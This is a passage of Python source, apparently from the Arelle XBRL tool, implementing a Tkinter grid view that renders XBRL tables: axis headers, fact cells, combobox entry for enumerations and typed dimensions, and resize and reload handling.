super(ViewRenderedGrid, self).close()
if self.modelXbrl:
for fp in self.factPrototypes:
fp.clear()
self.factPrototypes = None
self.aspectEntryObjectIdsNode.clear()
self.aspectEntryObjectIdsCell.clear()
self.rendrCntx = None # remove the reference but do not manipulate since it may still be in use and shared
def loadTablesMenu(self):
tblMenuEntries = {}
tblRelSet = self.modelXbrl.relationshipSet("Table-rendering")
self.tablesToELR = {}
for tblLinkroleUri in tblRelSet.linkRoleUris:
for tableAxisArcrole in getTableAxisArcroles():
tblAxisRelSet = self.modelXbrl.relationshipSet(tableAxisArcrole, tblLinkroleUri)
if tblAxisRelSet and len(tblAxisRelSet.modelRelationships) > 0:
# table name
modelRoleTypes = self.modelXbrl.roleTypes.get(tblLinkroleUri)
if modelRoleTypes is not None and len(modelRoleTypes) > 0:
roledefinition = modelRoleTypes[0].definition
if roledefinition is None or roledefinition == "":
roledefinition = os.path.basename(tblLinkroleUri)
for table in tblAxisRelSet.rootConcepts:
# add table to menu if there's any entry
tblMenuEntries[roledefinition] = tblLinkroleUri
self.tablesToELR[table.objectId()] = tblLinkroleUri
break
self.tablesMenu.delete(0, self.tablesMenuLength)
self.tablesMenuLength = 0
self.tblELR = None
for tblMenuEntry in sorted(tblMenuEntries.items()):
tbl,elr = tblMenuEntry
self.tablesMenu.add_command(label=tbl, command=lambda e=elr: self.view(viewTblELR=e)) # use this to activate profiling from menu selection: , profile=True))
self.tablesMenuLength += 1
if self.tblELR is None:
self.tblELR = elr # start viewing first ELR
def viewReloadDueToMenuAction(self, *args):
if not self.blockMenuEvents:
# update config (config saved when exiting)
self.options["ignoreDimValidity"] = self.ignoreDimValidity.get()
self.options["xAxisChildrenFirst"] = self.xAxisChildrenFirst.get()
self.options["yAxisChildrenFirst"] = self.yAxisChildrenFirst.get()
self.view()
def setOpenBreakdownEntryRows(self, *args):
import tkinter.simpledialog
newValue = tkinter.simpledialog.askinteger(_("arelle - Open breakdown entry rows setting"),
_("The number of extra entry rows for open breakdowns is: {0} \n\n"
"(When a row header includes an open breakdown, such as \nfor typed dimension(s), this number of extra entry rows \nare provided below the table.)"
).format(self.options["openBreakdownLines"]),
parent=self.tabWin)
if newValue is not None:
self.options["openBreakdownLines"] = self.openBreakdownLines = newValue
self.viewReloadDueToMenuAction()
def view(self, viewTblELR=None, newInstance=None, profile=False):
'''
if profile: # for debugging only, to use, uncomment in loadTablesMenu
import cProfile, pstats, sys
statsFile = "/Users/hermf/temp/profileRendering.bin"
cProfile.runctx("self.view(viewTblELR=viewTblELR)", globals(), locals(), statsFile)
priorStdOut = sys.stdout
sys.stdout = open("/Users/hermf/temp/profileRendering.txt", "w")
statObj = pstats.Stats(statsFile)
statObj.strip_dirs()
statObj.sort_stats("time")
statObj.print_stats()
statObj.print_callees()
statObj.print_callers()
sys.stdout.flush()
sys.stdout.close()
del statObj
sys.stdout = priorStdOut
os.remove(statsFile)
return
'''
startedAt = time.time()
self.blockMenuEvents += 1
if newInstance is not None:
self.modelXbrl = newInstance # a save operation has created a new instance to use subsequently
clearZchoices = False
if viewTblELR: # specific table selection
self.tblELR = viewTblELR
clearZchoices = True
else: # first or subsequent reloading (language, dimensions, other change)
clearZchoices = self.zOrdinateChoices is None
if clearZchoices: # also need first time initialization
self.loadTablesMenu() # load menus (and initialize if first time)
viewTblELR = self.tblELR
if not self.tblELR:
return # no table to display
if clearZchoices:
self.zOrdinateChoices = {}
# remove old widgets
self.viewFrame.clearGrid()
tblAxisRelSet, xTopStructuralNode, yTopStructuralNode, zTopStructuralNode = resolveAxesStructure(self, viewTblELR)
colAdjustment = 1 if zTopStructuralNode is not None else 0
self.table.resizeTable(self.dataFirstRow+self.dataRows-1, self.dataFirstCol+self.dataCols+colAdjustment-1, titleRows=self.dataFirstRow-1, titleColumns=self.dataFirstCol-1)
self.hasTableFilters = bool(self.modelTable.filterRelationships)
if tblAxisRelSet:
# review row header wrap widths and limit to 2/3 of the frame width (all are screen units)
fontWidth = tkFont.Font(font='TkTextFont').configure()['size']
fontWidth = fontWidth * 3 // 2
dataColsAllowanceWidth = (fontWidth * ENTRY_WIDTH_IN_CHARS + PADDING) * self.dataCols + PADDING
frameWidth = self.viewFrame.winfo_width()
if dataColsAllowanceWidth + self.rowHdrWrapLength > frameWidth:
if dataColsAllowanceWidth > frameWidth / 2:
rowHdrAllowanceWidth = frameWidth / 2
else:
rowHdrAllowanceWidth = frameWidth - dataColsAllowanceWidth
if self.rowHdrWrapLength > rowHdrAllowanceWidth:
widthRatio = rowHdrAllowanceWidth / self.rowHdrWrapLength
self.rowHdrWrapLength = rowHdrAllowanceWidth
fixedWidth = sum(w for w in self.rowHdrColWidth if w <= RENDER_UNITS_PER_CHAR)
adjustableWidth = sum(w for w in self.rowHdrColWidth if w > RENDER_UNITS_PER_CHAR)
if adjustableWidth > 0:
widthRatio = (rowHdrAllowanceWidth - fixedWidth) / adjustableWidth
for i in range(len(self.rowHdrColWidth)):
w = self.rowHdrColWidth[i]
if w > RENDER_UNITS_PER_CHAR:
self.rowHdrColWidth[i] = int(w * widthRatio)
self.aspectEntryObjectIdsNode.clear()
self.aspectEntryObjectIdsCell.clear()
self.factPrototypeAspectEntryObjectIds.clear()
self.table.initHeaderCellValue((self.modelTable.genLabel(lang=self.lang, strip=True) or # use table label, if any
self.roledefinition),
0, 0, (self.dataFirstCol - 2),
(self.dataFirstRow - 2),
XbrlTable.TG_TOP_LEFT_JUSTIFIED)
self.zAspectStructuralNodes = defaultdict(set)
self.zAxis(1, zTopStructuralNode, clearZchoices)
xStructuralNodes = []
colsFoundPlus1, _, _, _ = self.xAxis(self.dataFirstCol, self.colHdrTopRow, self.colHdrTopRow + self.colHdrRows - 1,
xTopStructuralNode, xStructuralNodes, self.xAxisChildrenFirst.get(), True, True)
_, rowsFoundPlus1 = self.yAxis(1, self.dataFirstRow,
yTopStructuralNode, self.yAxisChildrenFirst.get(), True, True)
self.table.resizeTable(rowsFoundPlus1-1,
colsFoundPlus1+colAdjustment-1,
clearData=False)
for fp in self.factPrototypes: # dereference prior facts
if fp is not None:
fp.clear()
self.factPrototypes = []
self.bodyCells(self.dataFirstRow, yTopStructuralNode, xStructuralNodes, self.zAspectStructuralNodes, self.yAxisChildrenFirst.get())
self.table.clearModificationStatus()
self.table.disableUnusedCells()
self.table.resizeTableCells()
# data cells
#print("body cells done")
self.modelXbrl.profileStat("viewTable_" + os.path.basename(viewTblELR), time.time() - startedAt)
#self.gridView.config(scrollregion=self.gridView.bbox(constants.ALL))
self.blockMenuEvents -= 1
def zAxis(self, row, zStructuralNode, clearZchoices):
if zStructuralNode is not None:
label = zStructuralNode.header(lang=self.lang)
xValue = self.dataFirstCol-1
yValue = row-1
self.table.initHeaderCellValue(label,
xValue, yValue,
0, 0,
XbrlTable.TG_LEFT_JUSTIFIED,
objectId=zStructuralNode.objectId())
if zStructuralNode.choiceStructuralNodes is not None: # combo box
valueHeaders = [''.ljust(zChoiceStructuralNode.indent * 4) + # indent if nested choices
(zChoiceStructuralNode.header(lang=self.lang) or '')
for zChoiceStructuralNode in zStructuralNode.choiceStructuralNodes]
zAxisIsOpenExplicitDimension = False
zAxisTypedDimension = None
i = zStructuralNode.choiceNodeIndex # for aspect entry, use header selected
comboBoxValue = None if i >= 0 else zStructuralNode.aspects.get('aspectValueLabel')
chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
aspect = None
for aspect in chosenStructuralNode.aspectsCovered():
if aspect != Aspect.DIMENSIONS:
break
# for open filter nodes of explicit dimension allow selection of all values
zAxisAspectEntryMode = False
if isinstance(chosenStructuralNode.definitionNode, ModelFilterDefinitionNode):
if isinstance(aspect, QName):
dimConcept = self.modelXbrl.qnameConcepts[aspect]
if dimConcept.isExplicitDimension:
if len(valueHeaders) != 1 or valueHeaders[0]: # not just a blank initial entry
valueHeaders.append("(all members)")
else:
valueHeaders.extend(
self.explicitDimensionFilterMembers(zStructuralNode, chosenStructuralNode))
zAxisAspectEntryMode = True
zAxisIsOpenExplicitDimension = True
elif dimConcept.isTypedDimension:
if (zStructuralNode.choiceStructuralNodes[0].contextItemBinding is None and
not valueHeaders[0]): # remove filterNode from the list
''' this isn't reliable
if i > 0:
del zStructuralNode.choiceStructuralNodes[0]
del valueHeaders[0]
zStructuralNode.choiceNodeIndex = i = i-1
'''
if i >= 0:
chosenStructuralNode = zStructuralNode.choiceStructuralNodes[i]
else:
chosenStructuralNode = zStructuralNode # use aspects of structural node (for entered typed value)
if not comboBoxValue and not valueHeaders:
comboBoxValue = "--please select--"
i = -1
valueHeaders.append("(enter typed member)")
zAxisTypedDimension = dimConcept
combobox = self.table.initHeaderCombobox(self.dataFirstCol,
row-1,
colspan=0,
values=valueHeaders,
value=comboBoxValue,
selectindex=zStructuralNode.choiceNodeIndex if i >= 0 else None,
comboboxselected=self.onZComboBoxSelected)
combobox.zStructuralNode = zStructuralNode
combobox.zAxisIsOpenExplicitDimension = zAxisIsOpenExplicitDimension
combobox.zAxisTypedDimension = zAxisTypedDimension
combobox.zAxisAspectEntryMode = zAxisAspectEntryMode
combobox.zAxisAspect = aspect
combobox.zChoiceOrdIndex = row - 1
combobox.objectId = zStructuralNode.objectId()
# add aspect for chosen node
self.setZStructuralNodeAspects(chosenStructuralNode)
else:
#process aspect on this node before child nodes in case it is overridden
self.setZStructuralNodeAspects(zStructuralNode)
# nested nodes override parent nodes
for zStructuralNode in zStructuralNode.childStructuralNodes:
self.zAxis(row + 1, zStructuralNode, clearZchoices)
def setZStructuralNodeAspects(self, zStructuralNode, add=True):
for aspect in aspectModels[self.aspectModel]:
if (aspect in zStructuralNode.aspects or # might be added as custom-entered value (typed dim)
zStructuralNode.hasAspect(aspect, inherit=True)): #implies inheriting from other z axes
if aspect == Aspect.DIMENSIONS:
for dim in (zStructuralNode.aspectValue(Aspect.DIMENSIONS, inherit=True) or emptyList):
if add:
self.zAspectStructuralNodes[dim].add(zStructuralNode)
else:
self.zAspectStructuralNodes[dim].discard(zStructuralNode)
else:
if add:
self.zAspectStructuralNodes[aspect].add(zStructuralNode)
else:
self.zAspectStructuralNodes[aspect].discard(zStructuralNode)
def onZComboBoxSelected(self, event):
combobox = event.widget
structuralNode = combobox.zStructuralNode
if combobox.zAxisAspectEntryMode:
aspectValue = structuralNode.aspectEntryHeaderValues.get(combobox.get())
if aspectValue is not None:
self.zOrdinateChoices[structuralNode.definitionNode] = \
structuralNode.aspects = {combobox.zAxisAspect: aspectValue, 'aspectValueLabel': combobox.get()}
self.view() # redraw grid
elif combobox.zAxisIsOpenExplicitDimension and combobox.get() == "(all members)":
# reload combo box
self.comboboxLoadExplicitDimension(combobox,
structuralNode, # owner of combobox
structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex]) # aspect filter node
structuralNode.choiceNodeIndex = -1 # use entry aspect value
combobox.zAxisAspectEntryMode = True
elif combobox.zAxisTypedDimension is not None and combobox.get() == "(enter typed member)":
# ask typed member entry
import tkinter.simpledialog
result = tkinter.simpledialog.askstring(_("Enter new typed dimension value"),
combobox.zAxisTypedDimension.label(),
parent=self.tabWin)
if result:
structuralNode.choiceNodeIndex = -1 # use entry aspect value
aspectValue = FunctionXfi.create_element(self.rendrCntx,
None,
(combobox.zAxisTypedDimension.typedDomainElement.qname, (), result))
self.zOrdinateChoices[structuralNode.definitionNode] = \
structuralNode.aspects = {combobox.zAxisAspect: aspectValue,
Aspect.DIMENSIONS: {combobox.zAxisTypedDimension.qname},
'aspectValueLabel': result}
if not hasattr(structuralNode, "aspectEntryHeaderValues"): structuralNode.aspectEntryHeaderValues = {}
structuralNode.aspectEntryHeaderValues[result] = aspectValue
valueHeaders = list(combobox["values"])
if result not in valueHeaders: valueHeaders.insert(0, result)
combobox["values"] = valueHeaders
combobox.zAxisAspectEntryMode = True
self.view() # redraw grid
else:
# remove prior combo choice aspect
self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[structuralNode.choiceNodeIndex], add=False)
i = combobox.valueIndex
self.zOrdinateChoices[combobox.zStructuralNode.definitionNode] = structuralNode.choiceNodeIndex = i
# set current combo choice aspect
self.setZStructuralNodeAspects(structuralNode.choiceStructuralNodes[i])
self.view() # redraw grid
def xAxis(self, leftCol, topRow, rowBelow, xParentStructuralNode, xStructuralNodes, childrenFirst, renderNow, atTop):
if xParentStructuralNode is not None:
parentRow = rowBelow
noDescendants = True
rightCol = leftCol
widthToSpanParent = 0
for xStructuralNode in xParentStructuralNode.childStructuralNodes:
if not xStructuralNode.isRollUp:
noDescendants = False
isLabeled = xStructuralNode.isLabeled
isAbstract = (xStructuralNode.isAbstract or
(xStructuralNode.childStructuralNodes and
not isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
isNonAbstract = not isAbstract
rightCol, row, width, leafNode = self.xAxis(leftCol, topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, # nested items before totals
childrenFirst, childrenFirst, False)
if row - 1 < parentRow:
parentRow = row - 1
#if not leafNode:
# rightCol -= 1
if isNonAbstract and isLabeled:
width += ENTRY_WIDTH_SCREEN_UNITS # width for this label, in screen units
widthToSpanParent += width
if childrenFirst:
thisCol = rightCol
else:
thisCol = leftCol
if renderNow and isLabeled:
columnspan = (rightCol - leftCol + (1 if isNonAbstract else 0))
label = xStructuralNode.header(lang=self.lang,
returnGenLabel=isinstance(xStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))
if label != OPEN_ASPECT_ENTRY_SURROGATE:
xValue = leftCol-1
yValue = topRow-1
headerLabel = label if label else " "
self.table.initHeaderCellValue(headerLabel,
xValue, yValue,
columnspan-1,
((row - topRow) if leafNode else 0),
XbrlTable.TG_CENTERED,
objectId=xStructuralNode.objectId(),
isRollUp=columnspan>1 and isNonAbstract and len(xStructuralNode.childStructuralNodes)<columnspan)
else:
self.aspectEntryObjectIdsNode[xStructuralNode.aspectEntryObjectId] = xStructuralNode
self.aspectEntryObjectIdsCell[xStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
topRow-1,
values=self.aspectEntryValues(xStructuralNode),
objectId=xStructuralNode.aspectEntryObjectId,
comboboxselected=self.onAspectComboboxSelection)
if isNonAbstract:
xValue = thisCol - 1
for i, role in enumerate(self.colHdrNonStdRoles):
j = (self.dataFirstRow
- len(self.colHdrNonStdRoles) + i)-1
self.table.initHeaderCellValue(xStructuralNode.header(role=role, lang=self.lang),
xValue,
j,
0,
0,
XbrlTable.TG_CENTERED,
objectId=xStructuralNode.objectId())
xStructuralNodes.append(xStructuralNode)
if isNonAbstract:
rightCol += 1
if renderNow and not childrenFirst:
self.xAxis(leftCol + (1 if isNonAbstract else 0), topRow + isLabeled, rowBelow, xStructuralNode, xStructuralNodes, childrenFirst, True, False) # render on this pass
leftCol = rightCol
return (rightCol, parentRow, widthToSpanParent, noDescendants)
def yAxis(self, leftCol, row, yParentStructuralNode, childrenFirst, renderNow, atLeft):
if yParentStructuralNode is not None:
nestedBottomRow = row
for yStructuralNode in yParentStructuralNode.childStructuralNodes:
if not yStructuralNode.isRollUp:
isAbstract = (yStructuralNode.isAbstract or
(yStructuralNode.childStructuralNodes and
not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord))))
isNonAbstract = not isAbstract
isLabeled = yStructuralNode.isLabeled
nestRow, nextRow = self.yAxis(leftCol + isLabeled, row, yStructuralNode, # nested items before totals
childrenFirst, childrenFirst, False)
topRow = row
if childrenFirst and isNonAbstract:
row = nextRow
if renderNow and isLabeled:
columnspan = self.rowHdrCols - leftCol + 1 if isNonAbstract or nextRow == row else 1
depth = yStructuralNode.depth
wraplength = (self.rowHdrColWidth[depth] if isAbstract else
self.rowHdrWrapLength - sum(self.rowHdrColWidth[0:depth]))
if wraplength < 0:
wraplength = self.rowHdrColWidth[depth]
label = yStructuralNode.header(lang=self.lang,
returnGenLabel=isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)),
recurseParent=not isinstance(yStructuralNode.definitionNode, ModelFilterDefinitionNode))
if label != OPEN_ASPECT_ENTRY_SURROGATE:
xValue = leftCol-1
yValue = row-1
self.table.initHeaderCellValue(label if label is not None else " ",
xValue, yValue,
columnspan-1,
(nestRow - row if isAbstract else 1)-1,
(XbrlTable.TG_LEFT_JUSTIFIED
if isNonAbstract or nestRow == row
else XbrlTable.TG_CENTERED),
objectId=yStructuralNode.objectId(),
isRollUp=columnspan>1 and isNonAbstract and (len(yStructuralNode.childStructuralNodes)>1 or (len(yStructuralNode.childStructuralNodes)==1 and not(yStructuralNode.childStructuralNodes[0].isAbstract))))
else:
self.aspectEntryObjectIdsNode[yStructuralNode.aspectEntryObjectId] = yStructuralNode
self.aspectEntryObjectIdsCell[yStructuralNode.aspectEntryObjectId] = self.table.initHeaderCombobox(leftCol-1,
row-1,
values=self.aspectEntryValues(yStructuralNode),
objectId=yStructuralNode.aspectEntryObjectId,
comboboxselected=self.onAspectComboboxSelection)
if isNonAbstract:
for i, role in enumerate(self.rowHdrNonStdRoles):
isCode = "code" in role
docCol = self.dataFirstCol - len(self.rowHdrNonStdRoles) + i-1
yValue = row-1
self.table.initHeaderCellValue(yStructuralNode.header(role=role, lang=self.lang),
docCol, yValue,
0, 0,
XbrlTable.TG_CENTERED if isCode else XbrlTable.TG_RIGHT_JUSTIFIED,
objectId=yStructuralNode.objectId())
if isNonAbstract:
row += 1
elif childrenFirst:
row = nextRow
if nestRow > nestedBottomRow:
nestedBottomRow = nestRow + (isNonAbstract and not childrenFirst)
if row > nestedBottomRow:
nestedBottomRow = row
#if renderNow and not childrenFirst:
# dummy, row = self.yAxis(leftCol + 1, row, yStructuralNode, childrenFirst, True, False) # render on this pass
if not childrenFirst:
dummy, row = self.yAxis(leftCol + isLabeled, row, yStructuralNode, childrenFirst, renderNow, False) # render on this pass
return (nestedBottomRow, row)
def getbackgroundColor(self, factPrototype):
bgColor = XbrlTable.TG_BG_DEFAULT # default monetary
concept = factPrototype.concept
if concept is None:
return bgColor
isNumeric = concept.isNumeric
# isMonetary = concept.isMonetary
isInteger = concept.baseXbrliType in integerItemTypes
isPercent = concept.typeQname in (qnPercentItemType, qnPureItemType)
isString = concept.baseXbrliType in ("stringItemType", "normalizedStringItemType")
isDate = concept.baseXbrliType in ("dateTimeItemType", "dateItemType")
if isNumeric:
if concept.isShares or isInteger:
bgColor = XbrlTable.TG_BG_ORANGE
elif isPercent:
bgColor = XbrlTable.TG_BG_YELLOW
# else assume isMonetary
elif isDate:
bgColor = XbrlTable.TG_BG_GREEN
elif isString:
bgColor = XbrlTable.TG_BG_VIOLET
return bgColor
def bodyCells(self, row, yParentStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst):
if yParentStructuralNode is not None:
dimDefaults = self.modelXbrl.qnameDimensionDefaults
for yStructuralNode in yParentStructuralNode.childStructuralNodes:
if yChildrenFirst:
row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
if not (yStructuralNode.isAbstract or
(yStructuralNode.childStructuralNodes and
not isinstance(yStructuralNode.definitionNode, (ModelClosedDefinitionNode, ModelEuAxisCoord)))) and yStructuralNode.isLabeled:
isYEntryPrototype = yStructuralNode.isEntryPrototype(default=False) # row to enter open aspects
yAspectStructuralNodes = defaultdict(set)
for aspect in aspectModels[self.aspectModel]:
if yStructuralNode.hasAspect(aspect):
if aspect == Aspect.DIMENSIONS:
for dim in (yStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
yAspectStructuralNodes[dim].add(yStructuralNode)
else:
yAspectStructuralNodes[aspect].add(yStructuralNode)
yTagSelectors = yStructuralNode.tagSelectors
# data for columns of row
#print ("row " + str(row) + "yNode " + yStructuralNode.definitionNode.objectId() )
ignoreDimValidity = self.ignoreDimValidity.get()
for i, xStructuralNode in enumerate(xStructuralNodes):
isEntryPrototype = isYEntryPrototype or xStructuralNode.isEntryPrototype(default=False)
xAspectStructuralNodes = defaultdict(set)
for aspect in aspectModels[self.aspectModel]:
if xStructuralNode.hasAspect(aspect):
if aspect == Aspect.DIMENSIONS:
for dim in (xStructuralNode.aspectValue(Aspect.DIMENSIONS) or emptyList):
xAspectStructuralNodes[dim].add(xStructuralNode)
else:
xAspectStructuralNodes[aspect].add(xStructuralNode)
cellTagSelectors = yTagSelectors | xStructuralNode.tagSelectors
cellAspectValues = {}
matchableAspects = set()
for aspect in _DICT_SET(xAspectStructuralNodes.keys()) | _DICT_SET(yAspectStructuralNodes.keys()) | _DICT_SET(zAspectStructuralNodes.keys()):
aspectValue = xStructuralNode.inheritedAspectValue(yStructuralNode,
self, aspect, cellTagSelectors,
xAspectStructuralNodes, yAspectStructuralNodes, zAspectStructuralNodes)
# value is None for a dimension whose value is not to be reported in this slice
if (isinstance(aspect, _INT) or # not a dimension
dimDefaults.get(aspect) != aspectValue or # explicit dim defaulted will equal the value
aspectValue is not None): # typed dim absent will be none
cellAspectValues[aspect] = aspectValue
matchableAspects.add(aspectModelAspect.get(aspect,aspect)) #filterable aspect from rule aspect
cellDefaultedDims = _DICT_SET(dimDefaults) - _DICT_SET(cellAspectValues.keys())
priItemQname = cellAspectValues.get(Aspect.CONCEPT)
concept = self.modelXbrl.qnameConcepts.get(priItemQname)
conceptNotAbstract = concept is None or not concept.isAbstract
value = None
objectId = None
justify = None
fp = FactPrototype(self, cellAspectValues)
if conceptNotAbstract:
# reduce set of matchable facts to those with pri item qname and have dimension aspects
facts = self.modelXbrl.factsByQname[priItemQname] if priItemQname else self.modelXbrl.factsInInstance
if self.hasTableFilters:
facts = self.modelTable.filterFacts(self.rendrCntx, facts)
for aspect in matchableAspects: # trim down facts with explicit dimensions match or just present
if isinstance(aspect, QName):
aspectValue = cellAspectValues.get(aspect, None)
if isinstance(aspectValue, ModelDimensionValue):
if aspectValue.isExplicit:
dimMemQname = aspectValue.memberQname # match facts with this explicit value
else:
dimMemQname = None # match facts that report this dimension
elif isinstance(aspectValue, QName):
dimMemQname = aspectValue # match facts that have this explicit value
elif aspectValue is None: # match typed dims that don't report this value
dimMemQname = ModelXbrl.DEFAULT
else:
dimMemQname = None # match facts that report this dimension
facts = facts & self.modelXbrl.factsByDimMemQname(aspect, dimMemQname)
if len(facts) == 0:
break
for fact in facts:
if (all(aspectMatches(self.rendrCntx, fact, fp, aspect)
for aspect in matchableAspects) and
all(fact.context.dimMemberQname(dim,includeDefaults=True) in (dimDefaults[dim], None)
for dim in cellDefaultedDims) and
len(fp.context.qnameDims) == len(fact.context.qnameDims)):
if yStructuralNode.hasValueExpression(xStructuralNode):
value = yStructuralNode.evalValueExpression(fact, xStructuralNode)
else:
value = fact.effectiveValue
objectId = fact.objectId()
justify = XbrlTable.TG_RIGHT_JUSTIFIED if fact.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
break
if (conceptNotAbstract and
(value is not None or ignoreDimValidity or isFactDimensionallyValid(self, fp) or
isEntryPrototype)):
if objectId is None:
objectId = "f{0}".format(len(self.factPrototypes))
self.factPrototypes.append(fp) # for property views
for aspect, aspectValue in cellAspectValues.items():
if isinstance(aspectValue, str) and aspectValue.startswith(OPEN_ASPECT_ENTRY_SURROGATE):
self.factPrototypeAspectEntryObjectIds[objectId].add(aspectValue)
modelConcept = fp.concept
if (justify is None) and modelConcept is not None:
justify = XbrlTable.TG_RIGHT_JUSTIFIED if modelConcept.isNumeric else XbrlTable.TG_LEFT_JUSTIFIED
if modelConcept is not None and modelConcept.isEnumeration:
myValidationObject = ValidateXbrl(self.modelXbrl)
myValidationObject.modelXbrl = self.modelXbrl
enumerationSet = ValidateXbrlDimensions.usableEnumerationMembers(myValidationObject, modelConcept)
enumerationDict = dict()
for enumerationItem in enumerationSet:
# we need to specify the concept linkrole to sort out between possibly many different labels
enumerationDict[enumerationItem.label(linkrole=modelConcept.enumLinkrole)] = enumerationItem.qname
enumerationValues = sorted(list(enumerationDict.keys()))
enumerationQNameStrings = [""]+list(str(enumerationDict[enumerationItem]) for enumerationItem in enumerationValues)
enumerationValues = [""]+enumerationValues
try:
selectedIdx = enumerationQNameStrings.index(value)
effectiveValue = enumerationValues[selectedIdx]
except ValueError:
effectiveValue = enumerationValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
enumerationValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx,
codes=enumerationDict)
elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliQNameItemType:
if eurofilingModelPrefix in concept.nsmap and concept.nsmap.get(eurofilingModelPrefix) == eurofilingModelNamespace:
hierarchy = concept.get("{" + eurofilingModelNamespace + "}" + "hierarchy", None)
domainQNameAsString = concept.get("{" + eurofilingModelNamespace + "}" + "domain", None)
if hierarchy is not None and domainQNameAsString is not None:
newAspectValues = [""]
newAspectQNames = dict()
newAspectQNames[""] = None
domPrefix, _, domLocalName = domainQNameAsString.strip().rpartition(":")
domNamespace = concept.nsmap.get(domPrefix)
relationships = concept_relationships(self.rendrCntx,
None,
(QName(domPrefix, domNamespace, domLocalName),
hierarchy, # linkrole,
"XBRL-dimensions",
'descendant'),
False) # return flat list
for rel in relationships:
if (rel.arcrole in (XbrlConst.dimensionDomain, XbrlConst.domainMember)
and rel.isUsable):
header = rel.toModelObject.label(lang=self.lang)
newAspectValues.append(header)
currentQName = rel.toModelObject.qname
if str(currentQName) == value:
value = header
newAspectQNames[header] = currentQName
else:
newAspectValues = None
else:
newAspectValues = None
if newAspectValues is None:
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellValue(value,
xValue,
yValue,
justification=justify,
objectId=objectId,
backgroundColourTag=self.getbackgroundColor(fp))
else:
qNameValues = newAspectValues
try:
selectedIdx = qNameValues.index(value)
effectiveValue = value
except ValueError:
effectiveValue = qNameValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
qNameValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx,
codes=newAspectQNames)
elif modelConcept is not None and modelConcept.type.qname == XbrlConst.qnXbrliBooleanItemType:
booleanValues = ["",
XbrlConst.booleanValueTrue,
XbrlConst.booleanValueFalse]
try:
selectedIdx = booleanValues.index(value)
effectiveValue = value
except ValueError:
effectiveValue = booleanValues[0]
selectedIdx = 0
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellCombobox(effectiveValue,
booleanValues,
xValue,
yValue,
objectId=objectId,
selectindex=selectedIdx)
else:
xValue = self.dataFirstCol + i-1
yValue = row-1
self.table.initCellValue(value,
xValue,
yValue,
justification=justify,
objectId=objectId,
backgroundColourTag=self.getbackgroundColor(fp))
else:
fp.clear() # dereference
row += 1
if not yChildrenFirst:
row = self.bodyCells(row, yStructuralNode, xStructuralNodes, zAspectStructuralNodes, yChildrenFirst)
return row
def onClick(self, event):
try:
objId = event.widget.objectId
if objId and objId[0] == "f":
viewableObject = self.factPrototypes[int(objId[1:])]
else:
viewableObject = objId
self.modelXbrl.viewModelObject(viewableObject)
except AttributeError: # not clickable
pass
self.modelXbrl.modelManager.cntlr.currentView = self
def cellEnter(self, *args):
# triggered on grid frame enter (not cell enter)
self.blockSelectEvent = 0
self.modelXbrl.modelManager.cntlr.currentView = self
def cellLeave(self, *args):
# triggered on grid frame leave (not cell leave)
self.blockSelectEvent = 1
# this method is not currently used
def cellSelect(self, *args):
if self.blockSelectEvent == 0 and self.blockViewModelObject == 0:
self.blockViewModelObject += 1
#self.modelXbrl.viewModelObject(self.nodeToObjectId[self.treeView.selection()[0]])
#self.modelXbrl.viewModelObject(self.treeView.selection()[0])
self.blockViewModelObject -= 1
def viewModelObject(self, modelObject):
if self.blockViewModelObject == 0:
self.blockViewModelObject += 1
try:
if isinstance(modelObject, ModelDtsObject.ModelRelationship):
objectId = modelObject.toModelObject.objectId()
else:
objectId = modelObject.objectId()
if objectId in self.tablesToELR:
self.view(viewTblELR=self.tablesToELR[objectId])
try:
self.modelXbrl.modelManager.cntlr.currentView = self.modelXbrl.guiViews.tableView
# force focus (synch) on the corresponding "Table" tab (useful in case of several instances)
self.modelXbrl.guiViews.tableView.tabWin.select(str(self.modelXbrl.guiViews.tableView.viewFrame))
except:
pass
except (KeyError, AttributeError):
pass
self.blockViewModelObject -= 1
def onConfigure(self, event, *args):
if not self.blockMenuEvents:
lastFrameWidth = getattr(self, "lastFrameWidth", 0)
lastFrameHeight = getattr(self, "lastFrameHeight", 0)
frameWidth = self.tabWin.winfo_width()
frameHeight = self.tabWin.winfo_height()
if lastFrameWidth != frameWidth or lastFrameHeight != frameHeight:
self.updateInstanceFromFactPrototypes()
self.lastFrameWidth = frameWidth
self.lastFrameHeight = frameHeight
self.setHeightAndWidth()
if lastFrameWidth:
# frame resized, recompute row header column widths and lay out table columns
"""
def sleepAndReload():
time.sleep(.75)
self.viewReloadDueToMenuAction()
self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((sleepAndReload, []))
"""
#self.modelXbrl.modelManager.cntlr.uiThreadQueue.put((self.viewReloadDueToMenuAction, []))
def deferredReload():
self.deferredReloadCount -= 1 # only do reload after all queued reload timers expire
if self.deferredReloadCount <= 0:
self.viewReloadDueToMenuAction()
self.deferredReloadCount = getattr(self, "deferredReloadCount", 0) + 1
self.viewFrame.after(1500, deferredReload)
def onQuitView(self, event, *args):
# this method is passed as callback when creating the view
# (to ScrolledTkTableFrame and then to XbrlTable that will monitor cell operations)
self.updateInstanceFromFactPrototypes()
self.updateProperties()
def hasChangesToSave(self):
return len(self.table.modifiedCells)
def updateProperties(self):
if self.modelXbrl is not None:
modelXbrl = self.modelXbrl
# make sure we handle an instance
